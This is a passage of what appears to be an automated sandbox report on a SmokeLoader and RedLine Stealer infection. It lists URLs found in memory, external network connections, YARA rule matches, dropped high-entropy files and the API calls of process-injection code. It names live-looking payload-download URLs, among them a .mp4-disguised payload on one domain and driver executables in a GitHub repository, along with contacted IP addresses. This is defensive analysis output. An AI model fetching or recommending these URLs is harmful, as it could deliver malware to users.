        Source: A723.exe, 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmp, A723.exe, 00000007.00000000.3669719251.0000000000409000.00000002.00000001.01000000.00000006.sdmp, C3F.exe, 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmp, C3F.exe, 0000000E.00000000.4002122911.0000000000408000.00000002.00000001.01000000.0000000B.sdmp, A723.exe.1.dr, C3F.exe.1.dr, 77D2.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000001.00000000.1714985098.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, A723.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
        Source: A723.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
        Source: A723.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: A723.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
        Source: explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: Bookings.7.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: Bookings.7.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
        Source: Bookings.7.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: explorer.exe, 00000001.00000000.1714596622.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1714204674.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1716009180.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: 3E6C.exe, 0000000C.00000002.3947321786.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Bookings.7.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: Bookings.7.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
        Source: Bookings.7.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: A723.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: explorer.exe, 00000001.00000000.1717647686.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
        Source: explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
        Source: explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
        Source: explorer.exe, 00000001.00000000.1717647686.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000001.00000000.1714985098.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000001.00000000.1714985098.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
        Source: explorer.exe, 00000001.00000000.1712334658.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712812085.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000001.00000000.1714985098.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
        Source: explorer.exe, 00000001.00000000.1714985098.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000001.00000000.1714985098.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
        Source: explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
        Source: explorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
        Source: RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
        Source: RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
        Source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
        Source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.0000000004095000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
        Source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
        Source: explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
        Source: 3E6C.exe, 0000000C.00000002.3947321786.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lotuseffectllc.com
        Source: 3E6C.exe, 0000000C.00000002.3947321786.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lotuseffectllc.com/plugins/panel/uploads/Mwczjtflz.mp4
        Source: 3E6C.exe, 0000000C.00000000.3893775169.0000000000A42000.00000002.00000001.01000000.00000008.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, Result.exe.12.dr, 3E6C.exe.1.drString found in binary or memory: https://lotuseffectllc.com/plugins/panel/uploads/Mwczjtflz.mp41PbOVxtHXhP2g/7AFwH2Lkw==
        Source: explorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
        Source: explorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
        Source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
        Source: 3E6C.exe, 0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
        Source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
        Source: RegAsm.exe, 00000015.00000002.4130432288.0000000002811000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000001.00000000.1717647686.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
        Source: explorer.exe, 00000001.00000000.1717647686.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: Bookings.7.drString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: Bookings.7.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: Bookings.7.drString found in binary or memory: https://www.globalsign.com/repository/06
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
        Source: explorer.exe, 00000001.00000000.1713516731.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: 3E6C.exe.1.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
        Source: 3E6C.exe, 0000000C.00000000.3893775169.0000000000A42000.00000002.00000001.01000000.00000008.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, Result.exe.12.dr, 3E6C.exe.1.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
        Source: explorer.exe, 00000001.00000000.1713516731.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
        Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
        Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
        Source: unknownHTTPS traffic detected: 51.79.230.147:443 -> 192.168.2.4:50050 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 192.185.146.136:443 -> 192.168.2.4:50064 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 192.185.175.158:443 -> 192.168.2.4:50067 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 45.118.248.184:443 -> 192.168.2.4:50076 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 192.185.175.158:443 -> 192.168.2.4:50077 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Yara detected SmokeLoader
        Source: Yara matchFile source: 00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1732336579.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.1983822753.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004050F9
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044D1

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Writes many files with high entropy
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\77D2.exe entropy: 7.99861310711Jump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A723.exe entropy: 7.9991819785Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Investigators entropy: 7.99981739938Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Realty entropy: 7.9997743227Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Showtimes entropy: 7.99968680094Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Handjob entropy: 7.99981747049Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Customise entropy: 7.99980537823Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Threesome entropy: 7.99980131446Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Sucking entropy: 7.99979584007Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Seconds entropy: 7.99976257101Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\Cumshot entropy: 7.99502682944Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Earrings entropy: 7.99693022839Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Modules entropy: 7.9983893278Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Spare entropy: 7.99725170222Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Delivering entropy: 7.99794689964Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Bus entropy: 7.99789467605Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Project entropy: 7.99725814241Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Grey entropy: 7.99794477526Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Wisdom entropy: 7.99765480154Jump to dropped file

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.1732453969.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000005.00000002.1983884104.0000000000A28000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.1732280470.00000000008AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000005.00000002.1983794099.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000000.00000002.1732336579.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000005.00000002.1983746430.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000005.00000002.1983822753.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00401630 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401630
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0040310D RtlCreateUserThread,NtTerminateProcess,0_2_0040310D
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00401647 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401647
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00401660 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401660
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00401663 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401663
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00401666 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401666
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00401674 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401674
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00401678 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401678
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0040282B NtEnumerateKey,NtClose,0_2_0040282B
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0040163B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040163B
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0040343D GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,0_2_0040343D
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0040249E NtQuerySystemInformation,NtQueryInformationProcess,0_2_0040249E
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004027E6 NtClose,0_2_004027E6
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00401630 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401630
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0040310D RtlCreateUserThread,NtTerminateProcess,5_2_0040310D
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00401647 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401647
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00401660 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401660
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00401663 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401663
